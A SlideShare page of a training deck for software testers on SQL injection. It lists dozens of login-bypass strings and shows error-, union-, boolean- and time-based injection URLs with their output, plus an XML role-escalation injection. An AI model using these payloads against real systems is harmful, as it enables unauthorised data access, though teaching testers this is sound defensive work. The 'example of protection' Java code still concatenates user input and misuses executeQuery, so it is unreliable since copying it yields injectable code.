SlideShare a Scribd company logo
SQL Injections
Every Tester Needs To Know
BY VLADIMIR ARUTIN
ABOUT MYSELF
VLADIMIR ARUTIN
SENIOR QA at AB SOFT
ISTQB Certified Test Manager
ISTQB and QA Manual Training Instructor
Certified Coach, Public Speaker
OWASP TOP 10
1. INJECTION
2. BROKEN AUTHENTICATION
3. SENSITIVE DATA EXPOSURE
4. XML EXTERNAL ENTITIES (XXE)
5. BROKEN ACCESS CONTROL
6. SECURITY MISCONFIGURATION
7. CROSS-SITE SCRIPTING
8. INSECURE DESERIALIZATION
9. USING COMPONENTS WITH KNOWN VULNERABILITIES
10. INSUFFICIENT LOGGING AND MONITORING
TYPES OF INJECTIONS
SQL
HTML
XML
Shell-command
Code
Log file
LDAP
SSI
XPath XAML
WHAT’S THE POINT
EXAMPLES
<h1>hacked</h1>
EXAMPLES
Web application template for search results page:
User query text:
Generated results: or such results:
EXAMPLES
<user>
<uname>qalab</uname>
<pwd>123456789</pwd>
<role>user</role>
<email>arutin.vladimir@gmail.com</email>
</user>
<user>
<uname>qalab</uname>
<pwd>123456789</pwd>
<role>user</role>
<email>arutin.vladimir@gmail.com</email>
</user>
……..
……..
<use>
<uname>Bill</uname>
<pwd>msk*Q^08f5WspV</pwd>
<role>administrator</role>
<email>bill.gates@microsoft.com</email>
</user>
EXAMPLES
<user>
<uname>qalab</uname>
<pwd>123456789</pwd>
<role>user</role>
<email>hack</email>
<role>administrator</role>
<email>arutin.vladimir@gmail.com</email>
</user>
Top Programming Languages 2020
Top Programming Languages 2020
vulnerable programming languages
2010-2019
WHEN YOU REMINDED THAT you wrote the
world’s biggest social network in PHP
TOTAL REPORTED OPEN SOURCE
VULNERABILITIES PER LANGUAGE
SQL INJECTIONS
HOW DOES IT HAPPEN?
a web application does not validate values received from a web
form, cookie, input parameter, etc., before passing them
to SQL queries.
Your code uses unsanitized data from user input in SQL statements
A malicious user includes SQL elements in the input in a tricky way
Your code executes these SQL elements as part of legitimate SQL
statements
EXAMPLES
SELECT * FROM users WHERE username = ‘admin’- -’
AND password = ‘password’
SELECT * FROM users WHERE username ="" or ""=""
AND password ="" or ""=""
SELECT * FROM clients WHERE clientID = 105 OR 1=1
SQL INJECTIONS EXAMPLES
qalab@gmail.com
xxx’) OR 1=1--]
SELECT * FROM users WHERE email=‘qalab@gmail.com’ AND password=md5(‘xxx’) OR 1=1--]’);
SQL INJECTIONS vocabulary
' or 1=1
' or 1=1–
' or 1=1#
' or 1=1/*
admin' –
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'–
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1–
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'–
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'–
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin',
'81dc9bdb52d04dc20036dbd8313ed055
admin" –
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"–
admin" or "1"="1"#
admin" or "1"="1"/*
admin“ or 1=1 or ""=“
admin" or 1=1
SQL Injection Types
Error-based SQL injection
• The attacker creates the SQL injection to make the back-end display an error
• The back-end returns an error to the attacker
• The attacker uses information contained in the error to escalate the attack
• is used to access sensitive information (database type, file names, and more)
SQL Injection Types
Error-based SQL injection
Example: http://testphp.vulnweb.com/listproducts.php?cat=1′
Result: The web application displays the following error in the browser:
Error: You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to use near ”’ at
line 1 Warning: mysql_fetch_array() expects parameter 1 to be resource,
boolean given in /hj/var/www/listproducts.php on line 74
SQL Injection Types
Union-based SQL injection
• The attacker uses a UNION clause in the payload
• The SQL engine combines sensitive information with legitimate
• information that the web application should display
• The web application displays sensitive information
SQL Injection Types
Example: http://testphp.vulnweb.com/artists.php?artist=-1 UNION SELECT
1,version(),current_user()
Result: The web application displays the system version and the name of the
current user:
5.1.73-0ubuntu0.10.04.1
acuart@localhost
Union-based SQL injection
SQL Injection Types
Boolean-based SQL injection
• The attacker sends many payloads that make the application
return a different resultS depending on TRUE or FALSE
• The attacker draws a conclusion from web application behavior
for each payload
• is often used to check whether any other SQL injections are
possible but it can also be used to access sensitive information
SQL Injection Types
Example:
http://testphp.vulnweb.com/artists.php?artist=1 AND 1=1
Payload 2:
http://testphp.vulnweb.com/artists.php?artist=1 AND 1=0
Result: In both cases, the application behaves differently. The attacker now
knows that the application is vulnerable to SQL injections.
Boolean-based SQL injection
SQL Injection Types
Time-based SQL injection
the attacker sends a payload that includes a time delay command such
as SLEEP, which delays the whole response
The attacker repeats the process as many times as possible with
different arguments
is used to guess the content of a database cell a character at a time by
using different ASCII values in conjunction with a time delay
SQL Injection Types
Example:
http://testphp.vulnweb.com/artists.php?artist=1-SLEEP(3)
Result: The page loads with a delay. is vulnerable to SQL injections.
Time-based SQL injection
DEMO TIME
WARNING
DON’T TRY THIS AT HOME
VLADIMIR ARUTIN, AB SOFT COMPANY AND IT STEP UNIVERSITY
DO NOT ADVOCATE REPLICATING THE ACTIONS IN THIS DEMO
AND DO NOT TAKE RESPONSIBILITY FOR THOSE WHO DO.
For Educational Purposes Only
How can you protect yourself?
Parameterized Statements
Stored procedures
Web application firewall
Whitelist Input Validation
Escaping All User Supplied Input
USE LIMIT IN SQL QUeRIES
Trust no one
Update and patch
Use appropriate privileges
Continuously monitor SQL statements from dB-connected apps
Buy better software
EXAMPLE OF PROTECTION
// Define which user we want to find.
String email = "user@email.com";
// Connect to the database.
Connection conn = DriverManager.getConnection(URL, USER, PASS);
Statement stmt = conn.createStatement();
// Construct the SQL statement we want to run, specifying the parameter.
String sql = "SELECT * FROM users WHERE email = '" + email + "'";
// Run the query, passing the 'email' parameter value...
ResultSet results = stmt.executeQuery(sql, email);
while (results.next()) {
// ...do something with the data returned.
}
String sql = "SELECT * FROM users WHERE email = ?";
CONCLUSION
BONUS
Danger IS everywhere
DEMO TIME
WARNING
DON’T TRY THIS AT HOME
VLADIMIR ARUTIN, AB SOFT COMPANY AND IT STEP UNIVERSITY
DO NOT ADVOCATE REPLICATING THE ACTIONS IN THIS DEMO
AND DO NOT TAKE RESPONSIBILITY FOR THOSE WHO DO.
For Educational Purposes Only
THANKS FOR WATCHING
AND
God bless your Data base
SQL INJECTIONS EVERY TESTER NEEDS TO KNOW

More Related Content

What's hot

Automated Testing for Websites With Selenium IDE
Automated Testing for Websites With Selenium IDEAutomated Testing for Websites With Selenium IDE
Automated Testing for Websites With Selenium IDE
Robert Greiner
 
Sql injection attacks
Sql injection attacksSql injection attacks
Sql injection attacks
chaitanya Lotankar
 
vodQA Pune (2019) - Browser automation using dev tools
vodQA Pune (2019) - Browser automation using dev toolsvodQA Pune (2019) - Browser automation using dev tools
vodQA Pune (2019) - Browser automation using dev tools
vodQA
 
Selenium tutorials
Selenium tutorialsSelenium tutorials
Selenium tutorials
Ducat
 
Sql injection attacks
Sql injection attacksSql injection attacks
Sql injection attacksKumar
 
Ppt of soap ui
Ppt of soap uiPpt of soap ui
Ppt of soap ui
pkslide28
 
Api testing libraries using java script an overview
Api testing libraries using java script   an overviewApi testing libraries using java script   an overview
Api testing libraries using java script an overview
vodQA
 
Mule intelli j tips
Mule intelli j tipsMule intelli j tips
Mule intelli j tips
Son Nguyen
 
Deployment automation framework with selenium
Deployment automation framework with seleniumDeployment automation framework with selenium
Deployment automation framework with selenium
Wenhua Wang
 
Automated Web Testing With Selenium
Automated Web Testing With SeleniumAutomated Web Testing With Selenium
Automated Web Testing With Selenium
Deepak Mittal
 
Automation
AutomationAutomation
Automation
freeuser_321
 
Common SQL Performance Issues
Common SQL Performance  IssuesCommon SQL Performance  Issues
Common SQL Performance Issues
William Forney
 
Selenium web driver
Selenium web driverSelenium web driver
Selenium web driver
Sun Technlogies
 
Selenium
SeleniumSelenium
Selenium
Sun Technlogies
 
Web Hacking series part 2
Web Hacking series part 2Web Hacking series part 2
Web Hacking series part 2
Aditya Kamat
 
Filter expression in mule
Filter expression in muleFilter expression in mule
Filter expression in mule
Rajkattamuri
 

What's hot (20)

Automated Testing for Websites With Selenium IDE
Automated Testing for Websites With Selenium IDEAutomated Testing for Websites With Selenium IDE
Automated Testing for Websites With Selenium IDE
 
Sql injection attacks
Sql injection attacksSql injection attacks
Sql injection attacks
 
vodQA Pune (2019) - Browser automation using dev tools
vodQA Pune (2019) - Browser automation using dev toolsvodQA Pune (2019) - Browser automation using dev tools
vodQA Pune (2019) - Browser automation using dev tools
 
Selenium tutorials
Selenium tutorialsSelenium tutorials
Selenium tutorials
 
Sql injection attacks
Sql injection attacksSql injection attacks
Sql injection attacks
 
Selenium
SeleniumSelenium
Selenium
 
Ppt of soap ui
Ppt of soap uiPpt of soap ui
Ppt of soap ui
 
Api testing libraries using java script an overview
Api testing libraries using java script   an overviewApi testing libraries using java script   an overview
Api testing libraries using java script an overview
 
Mule intelli j tips
Mule intelli j tipsMule intelli j tips
Mule intelli j tips
 
automationframework
automationframeworkautomationframework
automationframework
 
Deployment automation framework with selenium
Deployment automation framework with seleniumDeployment automation framework with selenium
Deployment automation framework with selenium
 
Automated Web Testing With Selenium
Automated Web Testing With SeleniumAutomated Web Testing With Selenium
Automated Web Testing With Selenium
 
Automation
AutomationAutomation
Automation
 
Common SQL Performance Issues
Common SQL Performance  IssuesCommon SQL Performance  Issues
Common SQL Performance Issues
 
Selenium web driver
Selenium web driverSelenium web driver
Selenium web driver
 
Career in java
Career in javaCareer in java
Career in java
 
Selenium
SeleniumSelenium
Selenium
 
Web Hacking series part 2
Web Hacking series part 2Web Hacking series part 2
Web Hacking series part 2
 
SchemaCrawler
SchemaCrawlerSchemaCrawler
SchemaCrawler
 
Filter expression in mule
Filter expression in muleFilter expression in mule
Filter expression in mule
 

Similar to SQL INJECTIONS EVERY TESTER NEEDS TO KNOW

ASP.NET Web Security
ASP.NET Web SecurityASP.NET Web Security
ASP.NET Web Security
SharePointRadi
 
SQLi for Security Champions
SQLi for Security ChampionsSQLi for Security Champions
SQLi for Security Champions
PetraVukmirovic
 
Attques web
Attques webAttques web
Attques web
Tarek MOHAMED
 
Sql injection
Sql injectionSql injection
Sql injection
Safwan Hashmi
 
Sql injection
Sql injectionSql injection
Sql injection
Suraj Tiwari
 
Sql injections (Basic bypass authentication)
Sql injections (Basic bypass authentication)Sql injections (Basic bypass authentication)
Sql injections (Basic bypass authentication)
Ravindra Singh Rathore
 
Cyber ppt
Cyber pptCyber ppt
Cyber ppt
karthik menon
 
Owasp Top 10 2017
Owasp Top 10 2017Owasp Top 10 2017
Owasp Top 10 2017
SamsonMuoki
 
Web Security - OWASP - SQL injection & Cross Site Scripting XSS
Web Security - OWASP - SQL injection & Cross Site Scripting XSSWeb Security - OWASP - SQL injection & Cross Site Scripting XSS
Web Security - OWASP - SQL injection & Cross Site Scripting XSS
Ivan Ortega
 
seminar report on Sql injection
seminar report on Sql injectionseminar report on Sql injection
seminar report on Sql injection
Jawhar Ali
 
DEFCON 23 - Lance buttars Nemus - sql injection on lamp
DEFCON 23 - Lance buttars Nemus - sql injection on lampDEFCON 23 - Lance buttars Nemus - sql injection on lamp
DEFCON 23 - Lance buttars Nemus - sql injection on lamp
Felipe Prado
 
Web Vulnerabilities_NGAN Seok Chern
Web Vulnerabilities_NGAN Seok ChernWeb Vulnerabilities_NGAN Seok Chern
Web Vulnerabilities_NGAN Seok ChernQuek Lilian
 
SQL Injection
SQL InjectionSQL Injection
SQL Injection
Asish Kumar Rath
 
香港六合彩
香港六合彩香港六合彩
香港六合彩
baoyin
 
Defcon 17-joseph mccray-adv-sql_injection
Defcon 17-joseph mccray-adv-sql_injectionDefcon 17-joseph mccray-adv-sql_injection
Defcon 17-joseph mccray-adv-sql_injectionAhmed AbdelSatar
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
cgt38842
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
azida3
 
OWASP_Top_Ten_Proactive_Controls version 2
OWASP_Top_Ten_Proactive_Controls version 2OWASP_Top_Ten_Proactive_Controls version 2
OWASP_Top_Ten_Proactive_Controls version 2
ssuser18349f1
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
johnpragasam1
 
OWASP_Top_Ten_Proactive_Controls_v32.pptx
OWASP_Top_Ten_Proactive_Controls_v32.pptxOWASP_Top_Ten_Proactive_Controls_v32.pptx
OWASP_Top_Ten_Proactive_Controls_v32.pptx
nmk42194
 

Similar to SQL INJECTIONS EVERY TESTER NEEDS TO KNOW (20)

ASP.NET Web Security
ASP.NET Web SecurityASP.NET Web Security
ASP.NET Web Security
 
SQLi for Security Champions
SQLi for Security ChampionsSQLi for Security Champions
SQLi for Security Champions
 
Attques web
Attques webAttques web
Attques web
 
Sql injection
Sql injectionSql injection
Sql injection
 
Sql injection
Sql injectionSql injection
Sql injection
 
Sql injections (Basic bypass authentication)
Sql injections (Basic bypass authentication)Sql injections (Basic bypass authentication)
Sql injections (Basic bypass authentication)
 
Cyber ppt
Cyber pptCyber ppt
Cyber ppt
 
Owasp Top 10 2017
Owasp Top 10 2017Owasp Top 10 2017
Owasp Top 10 2017
 
Web Security - OWASP - SQL injection & Cross Site Scripting XSS
Web Security - OWASP - SQL injection & Cross Site Scripting XSSWeb Security - OWASP - SQL injection & Cross Site Scripting XSS
Web Security - OWASP - SQL injection & Cross Site Scripting XSS
 
seminar report on Sql injection
seminar report on Sql injectionseminar report on Sql injection
seminar report on Sql injection
 
DEFCON 23 - Lance buttars Nemus - sql injection on lamp
DEFCON 23 - Lance buttars Nemus - sql injection on lampDEFCON 23 - Lance buttars Nemus - sql injection on lamp
DEFCON 23 - Lance buttars Nemus - sql injection on lamp
 
Web Vulnerabilities_NGAN Seok Chern
Web Vulnerabilities_NGAN Seok ChernWeb Vulnerabilities_NGAN Seok Chern
Web Vulnerabilities_NGAN Seok Chern
 
SQL Injection
SQL InjectionSQL Injection
SQL Injection
 
香港六合彩
香港六合彩香港六合彩
香港六合彩
 
Defcon 17-joseph mccray-adv-sql_injection
Defcon 17-joseph mccray-adv-sql_injectionDefcon 17-joseph mccray-adv-sql_injection
Defcon 17-joseph mccray-adv-sql_injection
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
 
OWASP_Top_Ten_Proactive_Controls version 2
OWASP_Top_Ten_Proactive_Controls version 2OWASP_Top_Ten_Proactive_Controls version 2
OWASP_Top_Ten_Proactive_Controls version 2
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
 
OWASP_Top_Ten_Proactive_Controls_v32.pptx
OWASP_Top_Ten_Proactive_Controls_v32.pptxOWASP_Top_Ten_Proactive_Controls_v32.pptx
OWASP_Top_Ten_Proactive_Controls_v32.pptx
 

More from Vladimir Arutin

The Human Side of Microservices
The Human Side of MicroservicesThe Human Side of Microservices
The Human Side of Microservices
Vladimir Arutin
 
Automation with Tosca Tricentis
Automation with Tosca TricentisAutomation with Tosca Tricentis
Automation with Tosca Tricentis
Vladimir Arutin
 
Экстремальный проектный менеджмент. Набор и управление командой
Экстремальный проектный менеджмент. Набор и управление командойЭкстремальный проектный менеджмент. Набор и управление командой
Экстремальный проектный менеджмент. Набор и управление командой
Vladimir Arutin
 
Мифы и правда о тестировании ПО
Мифы и правда о тестировании ПОМифы и правда о тестировании ПО
Мифы и правда о тестировании ПО
Vladimir Arutin
 
Software Testing Metrics
Software Testing MetricsSoftware Testing Metrics
Software Testing Metrics
Vladimir Arutin
 
Pairwise Testing
Pairwise TestingPairwise Testing
Pairwise Testing
Vladimir Arutin
 
BDD & Cucumber
BDD & CucumberBDD & Cucumber
BDD & Cucumber
Vladimir Arutin
 
Test Management by Vladimir Arutin
Test Management by Vladimir ArutinTest Management by Vladimir Arutin
Test Management by Vladimir Arutin
Vladimir Arutin
 

More from Vladimir Arutin (8)

The Human Side of Microservices
The Human Side of MicroservicesThe Human Side of Microservices
The Human Side of Microservices
 
Automation with Tosca Tricentis
Automation with Tosca TricentisAutomation with Tosca Tricentis
Automation with Tosca Tricentis
 
Экстремальный проектный менеджмент. Набор и управление командой
Экстремальный проектный менеджмент. Набор и управление командойЭкстремальный проектный менеджмент. Набор и управление командой
Экстремальный проектный менеджмент. Набор и управление командой
 
Мифы и правда о тестировании ПО
Мифы и правда о тестировании ПОМифы и правда о тестировании ПО
Мифы и правда о тестировании ПО
 
Software Testing Metrics
Software Testing MetricsSoftware Testing Metrics
Software Testing Metrics
 
Pairwise Testing
Pairwise TestingPairwise Testing
Pairwise Testing
 
BDD & Cucumber
BDD & CucumberBDD & Cucumber
BDD & Cucumber
 
Test Management by Vladimir Arutin
Test Management by Vladimir ArutinTest Management by Vladimir Arutin
Test Management by Vladimir Arutin
 

Recently uploaded

Hybrid optimization of pumped hydro system and solar- Engr. Abdul-Azeez.pdf
Hybrid optimization of pumped hydro system and solar- Engr. Abdul-Azeez.pdfHybrid optimization of pumped hydro system and solar- Engr. Abdul-Azeez.pdf
Hybrid optimization of pumped hydro system and solar- Engr. Abdul-Azeez.pdf
fxintegritypublishin
 
MCQ Soil mechanics questions (Soil shear strength).pdf
MCQ Soil mechanics questions (Soil shear strength).pdfMCQ Soil mechanics questions (Soil shear strength).pdf
MCQ Soil mechanics questions (Soil shear strength).pdf
Osamah Alsalih
 
Pile Foundation by Venkatesh Taduvai (Sub Geotechnical Engineering II)-conver...
Pile Foundation by Venkatesh Taduvai (Sub Geotechnical Engineering II)-conver...Pile Foundation by Venkatesh Taduvai (Sub Geotechnical Engineering II)-conver...
Pile Foundation by Venkatesh Taduvai (Sub Geotechnical Engineering II)-conver...
AJAYKUMARPUND1
 
WATER CRISIS and its solutions-pptx 1234
WATER CRISIS and its solutions-pptx 1234WATER CRISIS and its solutions-pptx 1234
WATER CRISIS and its solutions-pptx 1234
AafreenAbuthahir2
 
Design and Analysis of Algorithms-DP,Backtracking,Graphs,B&B
Design and Analysis of Algorithms-DP,Backtracking,Graphs,B&BDesign and Analysis of Algorithms-DP,Backtracking,Graphs,B&B
Design and Analysis of Algorithms-DP,Backtracking,Graphs,B&B
Sreedhar Chowdam
 
HYDROPOWER - Hydroelectric power generation
HYDROPOWER - Hydroelectric power generationHYDROPOWER - Hydroelectric power generation
HYDROPOWER - Hydroelectric power generation
Robbie Edward Sayers
 
The Benefits and Techniques of Trenchless Pipe Repair.pdf
The Benefits and Techniques of Trenchless Pipe Repair.pdfThe Benefits and Techniques of Trenchless Pipe Repair.pdf
The Benefits and Techniques of Trenchless Pipe Repair.pdf
Pipe Restoration Solutions
 
Industrial Training at Shahjalal Fertilizer Company Limited (SFCL)
Industrial Training at Shahjalal Fertilizer Company Limited (SFCL)Industrial Training at Shahjalal Fertilizer Company Limited (SFCL)
Industrial Training at Shahjalal Fertilizer Company Limited (SFCL)
MdTanvirMahtab2
 
ethical hacking in wireless-hacking1.ppt
ethical hacking in wireless-hacking1.pptethical hacking in wireless-hacking1.ppt
ethical hacking in wireless-hacking1.ppt
Jayaprasanna4
 
Standard Reomte Control Interface - Neometrix
Standard Reomte Control Interface - NeometrixStandard Reomte Control Interface - Neometrix
Standard Reomte Control Interface - Neometrix
Neometrix_Engineering_Pvt_Ltd
 
Planning Of Procurement o different goods and services
Planning Of Procurement o different goods and servicesPlanning Of Procurement o different goods and services
Planning Of Procurement o different goods and services
JoytuBarua2
 
Immunizing Image Classifiers Against Localized Adversary Attacks
Immunizing Image Classifiers Against Localized Adversary AttacksImmunizing Image Classifiers Against Localized Adversary Attacks
Immunizing Image Classifiers Against Localized Adversary Attacks
gerogepatton
 
ML for identifying fraud using open blockchain data.pptx
ML for identifying fraud using open blockchain data.pptxML for identifying fraud using open blockchain data.pptx
ML for identifying fraud using open blockchain data.pptx
Vijay Dialani, PhD
 
Governing Equations for Fundamental Aerodynamics_Anderson2010.pdf
Governing Equations for Fundamental Aerodynamics_Anderson2010.pdfGoverning Equations for Fundamental Aerodynamics_Anderson2010.pdf
Governing Equations for Fundamental Aerodynamics_Anderson2010.pdf
WENKENLI1
 
ASME IX(9) 2007 Full Version .pdf
ASME IX(9)  2007 Full Version       .pdfASME IX(9)  2007 Full Version       .pdf
ASME IX(9) 2007 Full Version .pdf
AhmedHussein950959
 
The role of big data in decision making.
The role of big data in decision making.The role of big data in decision making.
The role of big data in decision making.
ankuprajapati0525
 
Top 10 Oil and Gas Projects in Saudi Arabia 2024.pdf
Top 10 Oil and Gas Projects in Saudi Arabia 2024.pdfTop 10 Oil and Gas Projects in Saudi Arabia 2024.pdf
Top 10 Oil and Gas Projects in Saudi Arabia 2024.pdf
Teleport Manpower Consultant
 
AP LAB PPT.pdf ap lab ppt no title specific
AP LAB PPT.pdf ap lab ppt no title specificAP LAB PPT.pdf ap lab ppt no title specific
AP LAB PPT.pdf ap lab ppt no title specific
BrazilAccount1
 
Architectural Portfolio Sean Lockwood
Architectural Portfolio Sean LockwoodArchitectural Portfolio Sean Lockwood
Architectural Portfolio Sean Lockwood
seandesed
 
ethical hacking-mobile hacking methods.ppt
ethical hacking-mobile hacking methods.pptethical hacking-mobile hacking methods.ppt
ethical hacking-mobile hacking methods.ppt
Jayaprasanna4
 

Recently uploaded (20)

Hybrid optimization of pumped hydro system and solar- Engr. Abdul-Azeez.pdf
Hybrid optimization of pumped hydro system and solar- Engr. Abdul-Azeez.pdfHybrid optimization of pumped hydro system and solar- Engr. Abdul-Azeez.pdf
Hybrid optimization of pumped hydro system and solar- Engr. Abdul-Azeez.pdf
 
MCQ Soil mechanics questions (Soil shear strength).pdf
MCQ Soil mechanics questions (Soil shear strength).pdfMCQ Soil mechanics questions (Soil shear strength).pdf
MCQ Soil mechanics questions (Soil shear strength).pdf
 
Pile Foundation by Venkatesh Taduvai (Sub Geotechnical Engineering II)-conver...
Pile Foundation by Venkatesh Taduvai (Sub Geotechnical Engineering II)-conver...Pile Foundation by Venkatesh Taduvai (Sub Geotechnical Engineering II)-conver...
Pile Foundation by Venkatesh Taduvai (Sub Geotechnical Engineering II)-conver...
 
WATER CRISIS and its solutions-pptx 1234
WATER CRISIS and its solutions-pptx 1234WATER CRISIS and its solutions-pptx 1234
WATER CRISIS and its solutions-pptx 1234
 
Design and Analysis of Algorithms-DP,Backtracking,Graphs,B&B
Design and Analysis of Algorithms-DP,Backtracking,Graphs,B&BDesign and Analysis of Algorithms-DP,Backtracking,Graphs,B&B
Design and Analysis of Algorithms-DP,Backtracking,Graphs,B&B
 
HYDROPOWER - Hydroelectric power generation
HYDROPOWER - Hydroelectric power generationHYDROPOWER - Hydroelectric power generation
HYDROPOWER - Hydroelectric power generation
 
The Benefits and Techniques of Trenchless Pipe Repair.pdf
The Benefits and Techniques of Trenchless Pipe Repair.pdfThe Benefits and Techniques of Trenchless Pipe Repair.pdf
The Benefits and Techniques of Trenchless Pipe Repair.pdf
 
Industrial Training at Shahjalal Fertilizer Company Limited (SFCL)
Industrial Training at Shahjalal Fertilizer Company Limited (SFCL)Industrial Training at Shahjalal Fertilizer Company Limited (SFCL)
Industrial Training at Shahjalal Fertilizer Company Limited (SFCL)
 
ethical hacking in wireless-hacking1.ppt
ethical hacking in wireless-hacking1.pptethical hacking in wireless-hacking1.ppt
ethical hacking in wireless-hacking1.ppt
 
Standard Reomte Control Interface - Neometrix
Standard Reomte Control Interface - NeometrixStandard Reomte Control Interface - Neometrix
Standard Reomte Control Interface - Neometrix
 
Planning Of Procurement o different goods and services
Planning Of Procurement o different goods and servicesPlanning Of Procurement o different goods and services
Planning Of Procurement o different goods and services
 
Immunizing Image Classifiers Against Localized Adversary Attacks
Immunizing Image Classifiers Against Localized Adversary AttacksImmunizing Image Classifiers Against Localized Adversary Attacks
Immunizing Image Classifiers Against Localized Adversary Attacks
 
ML for identifying fraud using open blockchain data.pptx
ML for identifying fraud using open blockchain data.pptxML for identifying fraud using open blockchain data.pptx
ML for identifying fraud using open blockchain data.pptx
 
Governing Equations for Fundamental Aerodynamics_Anderson2010.pdf
Governing Equations for Fundamental Aerodynamics_Anderson2010.pdfGoverning Equations for Fundamental Aerodynamics_Anderson2010.pdf
Governing Equations for Fundamental Aerodynamics_Anderson2010.pdf
 
ASME IX(9) 2007 Full Version .pdf
ASME IX(9)  2007 Full Version       .pdfASME IX(9)  2007 Full Version       .pdf
ASME IX(9) 2007 Full Version .pdf
 
The role of big data in decision making.
The role of big data in decision making.The role of big data in decision making.
The role of big data in decision making.
 
Top 10 Oil and Gas Projects in Saudi Arabia 2024.pdf
Top 10 Oil and Gas Projects in Saudi Arabia 2024.pdfTop 10 Oil and Gas Projects in Saudi Arabia 2024.pdf
Top 10 Oil and Gas Projects in Saudi Arabia 2024.pdf
 
AP LAB PPT.pdf ap lab ppt no title specific
AP LAB PPT.pdf ap lab ppt no title specificAP LAB PPT.pdf ap lab ppt no title specific
AP LAB PPT.pdf ap lab ppt no title specific
 
Architectural Portfolio Sean Lockwood
Architectural Portfolio Sean LockwoodArchitectural Portfolio Sean Lockwood
Architectural Portfolio Sean Lockwood
 
ethical hacking-mobile hacking methods.ppt
ethical hacking-mobile hacking methods.pptethical hacking-mobile hacking methods.ppt
ethical hacking-mobile hacking methods.ppt
 

SQL INJECTIONS EVERY TESTER NEEDS TO KNOW